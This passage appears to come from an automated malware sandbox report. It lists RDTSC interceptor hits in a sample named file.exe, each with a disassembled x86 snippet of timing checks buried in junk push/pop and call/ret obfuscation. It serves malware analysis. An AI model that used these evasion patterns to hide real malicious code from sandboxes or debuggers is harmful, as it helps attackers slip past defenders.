    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAB15A second address: FAB15E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71EE2 second address: F71EE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F71EE6 second address: F71EEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA90C7 second address: FA90F2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a pushad 0x0000000b jc 00007FD8346DB1F6h 0x00000011 jmp 00007FD8346DB208h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA90F2 second address: FA90FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA90FB second address: FA90FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA90FF second address: FA911C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FD8346DCB34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA911C second address: FA912C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnc 00007FD8346DB1F6h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA927A second address: FA9280 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9280 second address: FA9284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9284 second address: FA92A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD8346DCB31h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA92A4 second address: FA92A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9514 second address: FA9518 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA978B second address: FA97A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007FD8346DB1FCh 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA98DE second address: FA98E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA98E2 second address: FA98E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA98E6 second address: FA9915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB34h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c jmp 00007FD8346DCB2Fh 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9915 second address: FA9919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9C59 second address: FA9C6A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007FD8346DCB26h 0x0000000b pop edi 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA9DB2 second address: FA9DB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F70382 second address: F70386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA1C9 second address: FAA1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAA9E0 second address: FAAA27 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FD8346DCB33h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FD8346DCB2Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD8346DCB37h 0x00000018 jng 00007FD8346DCB26h 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAA27 second address: FAAA2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAB7E second address: FAAB84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAB84 second address: FAABA5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD8346DB1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FD8346DB204h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAABA5 second address: FAABAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAABAB second address: FAABD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jbe 00007FD8346DB1F6h 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FD8346DB207h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAABD7 second address: FAABED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD8346DCB31h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAABED second address: FAABF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAFB5 second address: FAAFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD8346DCB26h 0x0000000a jmp 00007FD8346DCB30h 0x0000000f jno 00007FD8346DCB26h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAFD9 second address: FAAFDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAFDF second address: FAAFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAAFE7 second address: FAAFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1FE9 second address: FB2004 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2004 second address: FB200A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB215B second address: FB2162 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2292 second address: FB2296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2296 second address: FB229A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB229A second address: FB22BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [eax] 0x00000009 jnl 00007FD8346DB1FEh 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007FD8346DB1F6h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB22BF second address: FB22C9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD8346DCB26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2408 second address: FB240C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7C25 second address: FB7C31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FD8346DCB26h 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB7112 second address: FB7118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB5E4 second address: FBB5E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBB5E8 second address: FBB5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBB22 second address: FBBB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBB26 second address: FBBB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FD8346DB1FCh 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBB40 second address: FBBB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBBB44 second address: FBBB4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBCA7D second address: FBCAFA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a jng 00007FD8346DCB26h 0x00000010 pop ebx 0x00000011 pop eax 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FD8346DCB28h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov si, 773Dh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edx 0x00000036 call 00007FD8346DCB28h 0x0000003b pop edx 0x0000003c mov dword ptr [esp+04h], edx 0x00000040 add dword ptr [esp+04h], 00000014h 0x00000048 inc edx 0x00000049 push edx 0x0000004a ret 0x0000004b pop edx 0x0000004c ret 0x0000004d sub dword ptr [ebp+122D322Dh], eax 0x00000053 push 00000000h 0x00000055 sub dword ptr [ebp+122D2B58h], esi 0x0000005b xchg eax, ebx 0x0000005c je 00007FD8346DCB32h 0x00000062 jne 00007FD8346DCB2Ch 0x00000068 push eax 0x00000069 push ebx 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE6DC second address: FBE6E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE4AC second address: FBE4B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBE6E1 second address: FBE6E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF178 second address: FBF17D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBEFA9 second address: FBEFAE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBF17D second address: FBF1F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007FD8346DCB28h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 or dword ptr [ebp+122D3864h], eax 0x0000002b push 00000000h 0x0000002d add di, 4F73h 0x00000032 adc si, 0F9Eh 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007FD8346DCB28h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000018h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 jmp 00007FD8346DCB2Ch 0x0000005c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0F9B second address: FC101A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FD8346DB1F8h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 pop esi 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ebx 0x0000002a call 00007FD8346DB1F8h 0x0000002f pop ebx 0x00000030 mov dword ptr [esp+04h], ebx 0x00000034 add dword ptr [esp+04h], 0000001Ch 0x0000003c inc ebx 0x0000003d push ebx 0x0000003e ret 0x0000003f pop ebx 0x00000040 ret 0x00000041 mov esi, 08CBA81Dh 0x00000046 xchg eax, ebx 0x00000047 pushad 0x00000048 jmp 00007FD8346DB205h 0x0000004d push ebx 0x0000004e pushad 0x0000004f popad 0x00000050 pop ebx 0x00000051 popad 0x00000052 push eax 0x00000053 push eax 0x00000054 push edx 0x00000055 push ebx 0x00000056 jns 00007FD8346DB1F6h 0x0000005c pop ebx 0x0000005d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC0300 second address: FC030A instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD8346DCB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC101A second address: FC101F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5147 second address: FC514B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC514B second address: FC5151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5151 second address: FC5157 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5157 second address: FC515B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC515B second address: FC517D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD8346DCB2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push esi 0x0000000e jnc 00007FD8346DCB26h 0x00000014 pop esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jns 00007FD8346DCB26h 0x0000001d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC517D second address: FC5181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5181 second address: FC51D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FD8346DCB28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 call 00007FD8346DCB2Bh 0x00000029 pop edi 0x0000002a push 00000000h 0x0000002c mov di, dx 0x0000002f xchg eax, esi 0x00000030 pushad 0x00000031 pushad 0x00000032 push ebx 0x00000033 pop ebx 0x00000034 jne 00007FD8346DCB26h 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d jnp 00007FD8346DCB26h 0x00000043 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC51D5 second address: FC51E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5FB9 second address: FC5FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC5FBD second address: FC602A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD8346DB1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c add edi, dword ptr [ebp+122D1C3Bh] 0x00000012 movzx ebx, cx 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FD8346DB1F8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov di, 1D17h 0x00000035 adc di, 753Eh 0x0000003a push 00000000h 0x0000003c call 00007FD8346DB209h 0x00000041 mov dword ptr [ebp+122D1A33h], ebx 0x00000047 pop ebx 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jno 00007FD8346DB1F8h 0x00000051 push eax 0x00000052 pop eax 0x00000053 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC602A second address: FC603B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FD8346DCB28h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7FDC second address: FC7FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DB1FBh 0x00000009 popad 0x0000000a jmp 00007FD8346DB201h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC7FFD second address: FC8018 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 je 00007FD8346DCB28h 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jng 00007FD8346DCB2Eh 0x00000017 push edx 0x00000018 pop edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9541 second address: FC9545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC877A second address: FC877F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC982D second address: FC9836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCA701 second address: FCA706 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC9836 second address: FC983A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCB637 second address: FCB6BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jnp 00007FD8346DCB2Ah 0x0000000e mov bx, C073h 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007FD8346DCB28h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Dh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a call 00007FD8346DCB36h 0x0000003f mov ebx, dword ptr [ebp+122D1CB0h] 0x00000045 pop edi 0x00000046 mov eax, dword ptr [ebp+122D0859h] 0x0000004c call 00007FD8346DCB2Ch 0x00000051 mov bh, al 0x00000053 pop ebx 0x00000054 push FFFFFFFFh 0x00000056 mov ebx, dword ptr [ebp+122D2CC5h] 0x0000005c push eax 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 pop edi 0x00000062 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC5CA second address: FCC5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD5B4 second address: FCD5B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD5B8 second address: FCD5C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FD8346DB1F6h 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCC7D4 second address: FCC7EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD8346DCB32h 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD5C6 second address: FCD5E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD8346DB1F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD8346DB201h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FCD5E5 second address: FCD5EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
